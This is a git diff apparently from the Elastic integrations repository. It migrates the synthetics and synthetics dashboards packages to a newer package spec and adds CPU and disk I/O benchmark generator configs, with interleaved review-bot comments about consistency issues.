@@ -168,6 +168,7 @@ - name: answers level: extended type: object + object_type: keyword description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." - name: answers.class level: extended @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/http/fields/http.yml b/packages/synthetics/data_stream/http/fields/http.yml index 40dd8b42ee9..b113de142eb 100644 --- a/packages/synthetics/data_stream/http/fields/http.yml +++ b/packages/synthetics/data_stream/http/fields/http.yml @@ -22,6 +22,7 @@ - name: headers.* type: object + object_type: keyword enabled: false description: > The canonical headers of the monitored HTTP response. diff --git a/packages/synthetics/data_stream/http/fields/summary.yml b/packages/synthetics/data_stream/http/fields/summary.yml index 34bb24ac038..a35396da23c 100644 --- a/packages/synthetics/data_stream/http/fields/summary.yml +++ b/packages/synthetics/data_stream/http/fields/summary.yml 
@@ -16,19 +16,23 @@ type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. \ No newline at end of file + description: >- + A unique token used to group checks across attempts. diff --git a/packages/synthetics/data_stream/http/fields/tls.yml b/packages/synthetics/data_stream/http/fields/tls.yml index 4174905380c..4caa93a4cda 100644 --- a/packages/synthetics/data_stream/http/fields/tls.yml +++ b/packages/synthetics/data_stream/http/fields/tls.yml @@ -6,10 +6,8 @@ fields: - name: certificate_not_valid_before type: date - deprecated: 7.8.0 description: Deprecated in favor of `tls.server.x509.not_before`. Earliest time at which the connection's certificates are valid. - name: certificate_not_valid_after - deprecated: 7.8.0 type: date description: Deprecated in favor of `tls.server.x509.not_after`. Latest time at which the connection's certificates are valid. - name: rtt diff --git a/packages/synthetics/data_stream/http/lifecycle.yml b/packages/synthetics/data_stream/http/lifecycle.yml new file mode 100644 index 00000000000..d00bd25910f --- /dev/null +++ b/packages/synthetics/data_stream/http/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "365d" diff --git a/packages/synthetics/data_stream/http/manifest.yml b/packages/synthetics/data_stream/http/manifest.yml index a2d119d900a..f3fc8b50e9a 100644 --- a/packages/synthetics/data_stream/http/manifest.yml +++ b/packages/synthetics/data_stream/http/manifest.yml 
@@ -9,10 +9,12 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "monitor.id" - - "url.full.keyword" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "monitor.id" + - "url.full.keyword" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/http title: Synthetic monitor check @@ -52,7 +54,7 @@ streams: multi: false required: true show_user: true - default: "\"@every 3m\"" + default: '"@every 3m"' - name: urls type: text title: URL @@ -241,7 +243,7 @@ streams: title: Heartbeat mode multi: false required: false - show_user: true + show_user: true - name: ipv4 type: bool title: Use the ipv4 protocol @@ -270,4 +272,4 @@ streams: multi: false required: false show_user: true - default: 2 \ No newline at end of file + default: 2 diff --git a/packages/synthetics/data_stream/icmp/fields/common.yml b/packages/synthetics/data_stream/icmp/fields/common.yml index f8b7a9c61df..7b0cae0b4bb 100644 --- a/packages/synthetics/data_stream/icmp/fields/common.yml +++ b/packages/synthetics/data_stream/icmp/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/icmp/fields/ecs.yml b/packages/synthetics/data_stream/icmp/fields/ecs.yml index c2d2b7940fb..5d1d45001bd 100644 --- a/packages/synthetics/data_stream/icmp/fields/ecs.yml +++ b/packages/synthetics/data_stream/icmp/fields/ecs.yml 
@@ -169,6 +169,7 @@ level: extended type: object description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." + object_type: keyword - name: answers.class level: extended type: keyword @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/icmp/fields/summary.yml b/packages/synthetics/data_stream/icmp/fields/summary.yml index 34bb24ac038..a35396da23c 100644 --- a/packages/synthetics/data_stream/icmp/fields/summary.yml +++ b/packages/synthetics/data_stream/icmp/fields/summary.yml 
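Review bot: `object_type: keyword` is inserted after the long `description` here (icmp `ecs.yml`) and again in the tcp `ecs.yml` hunk, whereas the browser_screenshot and http `ecs.yml` hunks place it directly under `type: object`; the four files are otherwise identical copies, so the key order should match to keep future diffs between them clean. Moving the added line up to follow `type: object` is a one-line change in each of the two files.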
@@ -16,19 +16,23 @@ type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. \ No newline at end of file + description: >- + A unique token used to group checks across attempts. diff --git a/packages/synthetics/data_stream/icmp/fields/tls.yml b/packages/synthetics/data_stream/icmp/fields/tls.yml index 4174905380c..4caa93a4cda 100644 --- a/packages/synthetics/data_stream/icmp/fields/tls.yml +++ b/packages/synthetics/data_stream/icmp/fields/tls.yml @@ -6,10 +6,8 @@ fields: - name: certificate_not_valid_before type: date - deprecated: 7.8.0 description: Deprecated in favor of `tls.server.x509.not_before`. Earliest time at which the connection's certificates are valid. - name: certificate_not_valid_after - deprecated: 7.8.0 type: date description: Deprecated in favor of `tls.server.x509.not_after`. Latest time at which the connection's certificates are valid. - name: rtt diff --git a/packages/synthetics/data_stream/icmp/lifecycle.yml b/packages/synthetics/data_stream/icmp/lifecycle.yml new file mode 100644 index 00000000000..d00bd25910f --- /dev/null +++ b/packages/synthetics/data_stream/icmp/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "365d" diff --git a/packages/synthetics/data_stream/icmp/manifest.yml b/packages/synthetics/data_stream/icmp/manifest.yml index 151aa0e4fee..c6840cecb71 100644 --- a/packages/synthetics/data_stream/icmp/manifest.yml +++ b/packages/synthetics/data_stream/icmp/manifest.yml 
@@ -9,10 +9,12 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "monitor.id" - - "url.full.keyword" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "monitor.id" + - "url.full.keyword" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/icmp title: Synthetic monitor check @@ -52,7 +54,7 @@ streams: multi: false required: true show_user: true - default: "\"@every 3m\"" + default: '"@every 3m"' - name: wait type: text title: Wait @@ -116,7 +118,7 @@ streams: title: Heartbeat mode multi: false required: false - show_user: true + show_user: true - name: ipv4 type: bool title: Use the ipv4 protocol @@ -145,4 +147,4 @@ streams: multi: false required: false show_user: true - default: 2 \ No newline at end of file + default: 2 diff --git a/packages/synthetics/data_stream/tcp/fields/common.yml b/packages/synthetics/data_stream/tcp/fields/common.yml index f23c23af249..1d9a3208a97 100644 --- a/packages/synthetics/data_stream/tcp/fields/common.yml +++ b/packages/synthetics/data_stream/tcp/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/tcp/fields/ecs.yml b/packages/synthetics/data_stream/tcp/fields/ecs.yml index c2d2b7940fb..5d1d45001bd 100644 --- a/packages/synthetics/data_stream/tcp/fields/ecs.yml +++ b/packages/synthetics/data_stream/tcp/fields/ecs.yml 
@@ -169,6 +169,7 @@ level: extended type: object description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." + object_type: keyword - name: answers.class level: extended type: keyword @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/tcp/fields/summary.yml b/packages/synthetics/data_stream/tcp/fields/summary.yml index 34bb24ac038..a35396da23c 100644 --- a/packages/synthetics/data_stream/tcp/fields/summary.yml +++ b/packages/synthetics/data_stream/tcp/fields/summary.yml 
@@ -16,19 +16,23 @@ type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. \ No newline at end of file + description: >- + A unique token used to group checks across attempts. diff --git a/packages/synthetics/data_stream/tcp/fields/tls.yml b/packages/synthetics/data_stream/tcp/fields/tls.yml index 4174905380c..4caa93a4cda 100644 --- a/packages/synthetics/data_stream/tcp/fields/tls.yml +++ b/packages/synthetics/data_stream/tcp/fields/tls.yml @@ -6,10 +6,8 @@ fields: - name: certificate_not_valid_before type: date - deprecated: 7.8.0 description: Deprecated in favor of `tls.server.x509.not_before`. Earliest time at which the connection's certificates are valid. - name: certificate_not_valid_after - deprecated: 7.8.0 type: date description: Deprecated in favor of `tls.server.x509.not_after`. Latest time at which the connection's certificates are valid. - name: rtt diff --git a/packages/synthetics/data_stream/tcp/lifecycle.yml b/packages/synthetics/data_stream/tcp/lifecycle.yml new file mode 100644 index 00000000000..d00bd25910f --- /dev/null +++ b/packages/synthetics/data_stream/tcp/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "365d" diff --git a/packages/synthetics/data_stream/tcp/manifest.yml b/packages/synthetics/data_stream/tcp/manifest.yml index c162c9e8775..e97aff2cb3f 100644 --- a/packages/synthetics/data_stream/tcp/manifest.yml +++ b/packages/synthetics/data_stream/tcp/manifest.yml 
@@ -9,10 +9,12 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "monitor.id" - - "url.full.keyword" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "monitor.id" + - "url.full.keyword" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/tcp title: Synthetic monitor check @@ -52,7 +54,7 @@ streams: multi: false required: true show_user: true - default: "\"@every 3m\"" + default: '"@every 3m"' - name: hosts type: text title: Host @@ -170,7 +172,7 @@ streams: title: Heartbeat mode multi: false required: false - show_user: true + show_user: true - name: ipv4 type: bool title: Use the ipv4 protocol @@ -199,4 +201,4 @@ streams: multi: false required: false show_user: true - default: 2 \ No newline at end of file + default: 2 diff --git a/packages/synthetics/manifest.yml b/packages/synthetics/manifest.yml index f65158b904d..75a3519231b 100644 --- a/packages/synthetics/manifest.yml +++ b/packages/synthetics/manifest.yml @@ -1,12 +1,12 @@ -format_version: 1.0.0 +format_version: 3.0.0 name: synthetics title: Elastic Synthetics description: Internal Elastic integration for providing access to private locations. -version: 1.1.1 +version: 1.2.1 categories: ["observability"] -release: ga type: integration -license: basic +source: + license: Elastic-2.0 policy_templates: - name: synthetics title: Elastic Synthetics @@ -25,10 +25,16 @@ policy_templates: title: Browser description: Perform an Browser check conditions: - kibana.version: "^8.11.0" + elastic: + capabilities: + - "uptime" + subscription: "basic" + kibana: + version: "^8.11.0" icons: - src: /img/uptime-logo-color-64px.svg size: 16x16 type: image/svg+xml owner: github: elastic/obs-ux-infra_services-team + type: elastic diff --git a/packages/synthetics_dashboards/changelog.yml b/packages/synthetics_dashboards/changelog.yml index 7cbd1126192..ceb6e636f03 100644 --- a/packages/synthetics_dashboards/changelog.yml 
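Review bot: `format_version: 3.0.0` and the quoted `subscription: "basic"` in `packages/synthetics/manifest.yml` differ from the `format_version: 3.0.4` and unquoted `subscription: basic` chosen for `packages/synthetics_dashboards/manifest.yml` later in this commit; both are presumably accepted, but two packages migrated in one change should settle on one spec version and one quoting style. The version bump from `1.1.1` to `1.2.1` also skips `1.2.0`; if `1.2.0` was never published, that would be the conventional next version, and the synthetics changelog entry that would confirm the intent is not visible in this chunk.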
+++ b/packages/synthetics_dashboards/changelog.yml @@ -1,6 +1,11 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Update to Package Spec v3 + type: enhancement + link: https://github.com/elastic/integrations/pull/9066 - version: "1.0.0" changes: - description: initial release type: enhancement # can be one of: enhancement, bugfix, breaking-change - link: https://github.com/elastic/integrations/pull/8032 \ No newline at end of file + link: https://github.com/elastic/integrations/pull/8032 diff --git a/packages/synthetics_dashboards/kibana/dashboard/synthetics_dashboards-e465c570-1561-11ee-9d3b-15ab835418fd.json b/packages/synthetics_dashboards/kibana/dashboard/synthetics_dashboards-e465c570-1561-11ee-9d3b-15ab835418fd.json index d81399cbb6d..a592cebd6f8 100644 --- a/packages/synthetics_dashboards/kibana/dashboard/synthetics_dashboards-e465c570-1561-11ee-9d3b-15ab835418fd.json +++ b/packages/synthetics_dashboards/kibana/dashboard/synthetics_dashboards-e465c570-1561-11ee-9d3b-15ab835418fd.json @@ -242,11 +242,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-65aa1d2b-0064-4055-a37f-6144a7d1f3c7", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-65aa1d2b-0064-4055-a37f-6144a7d1f3c7", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" @@ -643,11 +645,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-65aa1d2b-0064-4055-a37f-6144a7d1f3c7", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-65aa1d2b-0064-4055-a37f-6144a7d1f3c7", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" 
@@ -833,11 +837,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-42ee11c3-ab9a-4b73-a2ba-65c4ad273b2d", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-42ee11c3-ab9a-4b73-a2ba-65c4ad273b2d", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" @@ -1062,11 +1068,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-unifiedHistogram", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-unifiedHistogram", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" @@ -1386,11 +1394,13 @@ } } ], - "internalReferences": [{ - "id": "synthetics-dashboards-integration-adhoc", - "name": "indexpattern-datasource-layer-e1869c68-3f80-4b33-b75f-f9668b5bcd94", - "type": "index-pattern" - }], + "internalReferences": [ + { + "id": "synthetics-dashboards-integration-adhoc", + "name": "indexpattern-datasource-layer-e1869c68-3f80-4b33-b75f-f9668b5bcd94", + "type": "index-pattern" + } + ], "query": { "language": "kuery", "query": "" diff --git a/packages/synthetics_dashboards/manifest.yml b/packages/synthetics_dashboards/manifest.yml index a36d2c3bdfd..3087f1bed3f 100644 --- a/packages/synthetics_dashboards/manifest.yml +++ b/packages/synthetics_dashboards/manifest.yml 
@@ -1,17 +1,23 @@ -format_version: 1.0.0 +format_version: 3.0.4 name: synthetics_dashboards title: Elastic Synthetics Dashboards description: Explore Elastic Synthetics metrics with these dashboards. -version: 1.0.0 +version: 1.0.1 categories: ["observability"] -release: ga type: integration -license: basic +source: + license: Elastic-2.0 conditions: - kibana.version: "^8.10.1" + elastic: + capabilities: + - "uptime" + subscription: basic + kibana: + version: "^8.10.1" icons: - src: /img/uptime-logo-color-64px.svg size: 16x16 type: image/svg+xml owner: - github: elastic/obs-ux-infra_services-team \ No newline at end of file + type: elastic + github: elastic/obs-ux-infra_services-team diff --git a/packages/system/_dev/benchmark/rally/cpu-benchmark.yml b/packages/system/_dev/benchmark/rally/cpu-benchmark.yml new file mode 100644 index 00000000000..12b70350901 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/cpu-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 system.cpu events ingested +data_stream: + name: cpu +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./cpu-benchmark/template.ndjson + config: + path: ./cpu-benchmark/config.yml + fields: + path: ./cpu-benchmark/fields.yml diff --git a/packages/system/_dev/benchmark/rally/cpu-benchmark/config.yml b/packages/system/_dev/benchmark/rally/cpu-benchmark/config.yml new file mode 100644 index 00000000000..2e353a48fd3 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/cpu-benchmark/config.yml 
@@ -0,0 +1,99 @@
+fields:
+ - name: timestamp
+ period: 60m
+ - name: event_duration
+ range:
+ min: 0
+ max: 100000
+ - name: user_pct
+ range:
+ min: 0
+ max: 100
+ - name: nice_pct
+ range:
+ min: 0
+ max: 100
+ - name: idle_pct
+ range:
+ min: 0
+ max: 100
+ - name: iowait_pct
+ range:
+ min: 0
+ max: 100
+ - name: irq_pct
+ range:
+ min: 0
+ max: 100
+ - name: softirq_pct
+ range:
+ min: 0
+ max: 100
+ - name: steal_pct
+ range:
+ min: 0
+ max: 100
+ - name: total_pct
+ range:
+ min: 0
+ max: 100
+ - name: user_norm_pct
+ range:
+ min: 0
+ max: 100
+ - name: norm_pct
+ range:
+ min: 0
+ max: 100
+ - name: nice_norm_pct
+ range:
+ min: 0
+ max: 100
+ - name: idle_norm_pct
+ range:
+ min: 0
+ max: 100
+ - name: iowait_norm_pct
+ range:
+ min: 0
+ max: 100
+ - name: irq_norm_pct
+ range:
+ min: 0
+ max: 100
+ - name: softirq_norm_pct
+ range:
+ min: 0
+ max: 100
+ - name: system_pct
+ range:
+ min: 0
+ max: 100
+ - name: steal_norm_pct
+ range:
+ min: 0
+ max: 100
+ - name: total_norm_pct
+ range:
+ min: 0
+ max: 100
+ - name: user_ticks
+ counter: true
+ - name: system_ticks
+ counter: true
+ - name: nice_ticks
+ counter: true
+ - name: idle_ticks
+ counter: true
+ - name: iowait_ticks
+ counter: true
+ - name: irq_ticks
+ counter: true
+ - name: softirq_ticks
+ counter: true
+ - name: steal_ticks
+ counter: true
+ - name: cpu_pct
+ range:
+ min: 0
+ max: 1
diff --git a/packages/system/_dev/benchmark/rally/cpu-benchmark/fields.yml b/packages/system/_dev/benchmark/rally/cpu-benchmark/fields.yml
new file mode 100644
index 00000000000..cea2cbcbe34
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/cpu-benchmark/fields.yml
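Review bot: `total_ticks` is missing from this cpu-benchmark `config.yml` even though the sibling `fields.yml` declares it and `template.ndjson` calls `generate "total_ticks"`, so the generator will either fail on the unconfigured field or emit whatever its default is; adding `- name: total_ticks` / `counter: true` next to the other `_ticks` entries makes the three files agree. The timestamp entry also uses `period: 60m` whereas `diskio-benchmark/config.yml` uses `period: -60m`; I cannot tell from the diff which sign the generator expects, but the two benchmarks presumably want the same time window, so one of them should be aligned and a comment should say which direction the period runs.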
@@ -0,0 +1,60 @@
+- name: timestamp
+ type: date
+- name: event_duration
+ type: long
+- name: user_pct
+ type: float
+- name: nice_pct
+ type: float
+- name: idle_pct
+ type: float
+- name: iowait_pct
+ type: float
+- name: irq_pct
+ type: float
+- name: softirq_pct
+ type: float
+- name: steal_pct
+ type: float
+- name: total_pct
+ type: float
+- name: user_norm_pct
+ type: float
+- name: norm_pct
+ type: float
+- name: nice_norm_pct
+ type: float
+- name: idle_norm_pct
+ type: float
+- name: iowait_norm_pct
+ type: float
+- name: irq_norm_pct
+ type: float
+- name: system_pct
+ type: float
+- name: softirq_norm_pct
+ type: float
+- name: steal_norm_pct
+ type: float
+- name: total_norm_pct
+ type: float
+- name: user_ticks
+ type: long
+- name: system_ticks
+ type: long
+- name: nice_ticks
+ type: long
+- name: idle_ticks
+ type: long
+- name: iowait_ticks
+ type: long
+- name: irq_ticks
+ type: long
+- name: softirq_ticks
+ type: long
+- name: steal_ticks
+ type: long
+- name: total_ticks
+ type: long
+- name: cpu_pct
+ type: float
diff --git a/packages/system/_dev/benchmark/rally/cpu-benchmark/template.ndjson b/packages/system/_dev/benchmark/rally/cpu-benchmark/template.ndjson
new file mode 100644
index 00000000000..7b0c7d280c0
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/cpu-benchmark/template.ndjson
@@ -0,0 +1,154 @@
+{{- $event_duration := generate "event_duration" }}
+{{- $timestamp := generate "timestamp" }}
+{{- $user_pct := generate "user_pct" }}
+{{- $nice_pct := generate "nice_pct" }}
+{{- $idle_pct := generate "idle_pct" }}
+{{- $iowait_pct := generate "iowait_pct" }}
+{{- $irq_pct := generate "irq_pct" }}
+{{- $softirq_pct := generate "softirq_pct" }}
+{{- $steal_pct := generate "steal_pct" }}
+{{- $total_pct := generate "total_pct" }}
+{{- $user_norm_pct := generate "user_norm_pct" }}
+{{- $norm_pct := generate "norm_pct" }}
+{{- $nice_norm_pct := generate "nice_norm_pct" }}
+{{- $idle_norm_pct := generate "idle_norm_pct" }}
+{{- $iowait_norm_pct := generate "iowait_norm_pct" }}
+{{- $irq_norm_pct := generate "irq_norm_pct" }}
+{{- $system_pct := generate "system_pct" }}
+{{- $softirq_norm_pct := generate "softirq_norm_pct" }}
+{{- $steal_norm_pct := generate "steal_norm_pct" }}
+{{- $total_norm_pct := generate "total_norm_pct" }}
+{{- $user_ticks := generate "user_ticks" }}
+{{- $nice_ticks := generate "nice_ticks" }}
+{{- $idle_ticks := generate "idle_ticks" }}
+{{- $iowait_ticks := generate "iowait_ticks" }}
+{{- $irq_ticks := generate "irq_ticks" }}
+{{- $softirq_ticks := generate "softirq_ticks" }}
+{{- $steal_ticks := generate "steal_ticks" }}
+{{- $system_ticks := generate "system_ticks" }}
+{{- $total_ticks := generate "total_ticks" }}
+{{- $cpu_pct := generate "cpu_pct" }}
+{
+ "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}",
+ "agent": {
+ "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e",
+ "id": "de42127b-4db8-4471-824e-a7b14f478663",
+ "name": "system-scale-123456",
+ "type": "metricbeat",
+ "version": "8.12.1"
+ },
+ "data_stream": {
+ "dataset": "system.cpu",
+ "namespace": "ep",
+ "type": "metrics"
+ },
+ "ecs": {
+ "version": "8.0.0"
+ },
+ "elastic_agent": {
+ "id": "de42127b-4db8-4471-824e-a7b14f478663",
+ "snapshot": false,
+ "version": "8.12.0"
+ },
+ "event": {
+ "agent_id_status": "verified",
+ "duration": {{ $event_duration }},
+ "module": "system"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "containerized": true,
+ "cpu": {
+ "pct": {{ $cpu_pct }}
+ },
+ "hostname": "docker-fleet-agent",
+ "id": "829324aac17946dcace17006fa82a2d2",
+ "ip": "192.168.254.7",
+ "mac": "02-42-C0-A8-FE-07",
+ "name": "docker-fleet-agent",
+ "os": {
+ "codename": "focal",
+ "family": "debian",
+ "kernel": "3.10.0-1160.105.1.el7.x86_64",
+ "name": "Ubuntu",
+ "platform": "ubuntu",
+ "type": "linux",
+ "version": "20.04.6 LTS (Focal Fossa)"
+ }
+ },
+ "metricset": {
+ "name": "cpu",
+ "period": 10000
+ },
+ "service": {
+ "type": "system"
+ },
+ "system": {
+ "cpu": {
+ "cores": 12,
+ "idle": {
+ "norm": {
+ "pct": {{ divf $idle_norm_pct 100 }}
+ },
+ "pct": {{ $idle_pct }},
+ "ticks": {{ $idle_ticks }}
+ },
+ "iowait": {
+ "norm": {
+ "pct": {{ divf $iowait_norm_pct 100 }}
+ },
+ "pct": {{ $iowait_pct }},
+ "ticks": {{ $iowait_ticks }}
+ },
+ "irq": {
+ "norm": {
+ "pct": {{ divf $irq_norm_pct 100 }}
+ },
+ "pct": {{ $irq_pct }},
+ "ticks": {{ $irq_ticks }}
+ },
+ "nice": {
+ "norm": {
+ "pct": {{ divf $nice_norm_pct 100 }}
+ },
+ "pct": {{ $nice_pct }},
+ "ticks": {{ $nice_ticks }}
+ },
+ "softirq": {
+ "norm": {
+ "pct": {{ divf $softirq_norm_pct 100 }}
+ },
+ "pct": {{ $softirq_pct }},
+ "ticks": {{ $softirq_ticks }}
+ },
+ "steal": {
+ "norm": {
+ "pct": {{ divf $steal_norm_pct 100 }}
+ },
+ "pct": {{ $steal_pct }},
+ "ticks": {{ $steal_ticks }}
+ },
+ "system": {
+ "norm": {
+ "pct": {{ divf $norm_pct 100 }}
+ },
+ "pct": {{ $system_pct }},
+ "ticks": {{ $system_ticks }}
+ },
+ "total": {
+ "norm": {
+ "pct": {{ divf $total_norm_pct 100 }}
+ },
+ "pct": {{ $total_pct }},
+ "ticks": {{ $total_ticks }}
+ },
+ "user": {
+ "norm": {
+ "pct": {{ divf $user_norm_pct 100 }}
+ },
+ "pct": {{ $user_pct }},
+ "ticks": {{ $user_ticks }}
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/system/_dev/benchmark/rally/diskio-benchmark.yml b/packages/system/_dev/benchmark/rally/diskio-benchmark.yml
new file mode 100644
index 00000000000..1c6535e11e1
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/diskio-benchmark.yml
@@ -0,0 +1,14 @@
+---
+description: Benchmark 20000 system.diskio events ingested
+data_stream:
+ name: diskio
+corpora:
+ generator:
+ total_events: 20000
+ template:
+ type: gotext
+ path: ./diskio-benchmark/template.ndjson
+ config:
+ path: ./diskio-benchmark/config.yml
+ fields:
+ path: ./diskio-benchmark/fields.yml
diff --git a/packages/system/_dev/benchmark/rally/diskio-benchmark/config.yml b/packages/system/_dev/benchmark/rally/diskio-benchmark/config.yml
new file mode 100644
index 00000000000..9e00a864bb5
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/diskio-benchmark/config.yml
@@ -0,0 +1,27 @@
+fields:
+ - name: timestamp
+ period: -60m
+ - name: event_duration
+ range:
+ min: 0
+ max: 100000
+ - name: system_diskio_name
+ enum: ["sda", "sda1", "sda2", "dm-0", "dm-1"]
+ - name: system_diskio_read_count
+ counter: true
+ - name: system_diskio_write_count
+ counter: true
+ - name: system_diskio_read_bytes
+ counter: true
+ - name: system_diskio_write_bytes
+ counter: true
+ - name: system_diskio_read_time
+ counter: true
+ - name: system_diskio_write_time
+ counter: true
+ - name: system_diskio_io_time
+ counter: true
+ - name: system_diskio_io_ops
+ range:
+ min: 0
+ max: 10
diff --git a/packages/system/_dev/benchmark/rally/diskio-benchmark/fields.yml b/packages/system/_dev/benchmark/rally/diskio-benchmark/fields.yml
new file mode 100644
index 00000000000..73a5694b12a
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/diskio-benchmark/fields.yml
@@ -0,0 +1,22 @@
+- name: timestamp
+ type: date
+- name: event_duration
+ type: long
+- name: system_diskio_name
+ type: keyword
+- name: system_diskio_read_count
+ type: long
+- name: system_diskio_write_count
+ type: long
+- name: system_diskio_read_bytes
+ type: long
+- name: system_diskio_write_bytes
+ type: long
+- name: system_diskio_read_time
+ type: long
+- name: system_diskio_write_time
+ type: long
+- name: system_diskio_io_time
+ type: long
+- name: system_diskio_io_ops
+ type: long
diff --git a/packages/system/_dev/benchmark/rally/diskio-benchmark/template.ndjson b/packages/system/_dev/benchmark/rally/diskio-benchmark/template.ndjson
new file mode 100644
index 00000000000..7a212e30810
--- /dev/null
+++ b/packages/system/_dev/benchmark/rally/diskio-benchmark/template.ndjson
@@ -0,0 +1,95 @@
+{{- $event_duration := generate "event_duration" }}
+{{- $timestamp := generate "timestamp" }}
+{{- $system_diskio_io_time := generate "system_diskio_io_time" }}
+{{- $system_diskio_io_ops := generate "system_diskio_io_ops" }}
+{{- $system_diskio_name := generate "system_diskio_name" }}
+{{- $system_diskio_read_count := generate "system_diskio_read_count" }}
+{{- $system_diskio_write_count := generate "system_diskio_write_count" }}
+{{- $system_diskio_read_bytes := generate "system_diskio_read_bytes" }}
+{{- $system_diskio_write_bytes := generate "system_diskio_write_bytes" }}
+{{- $system_diskio_read_time := generate "system_diskio_read_time" }}
+{{- $system_diskio_write_time := generate "system_diskio_write_time" }}
+{
+ "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}",
+ "agent": {
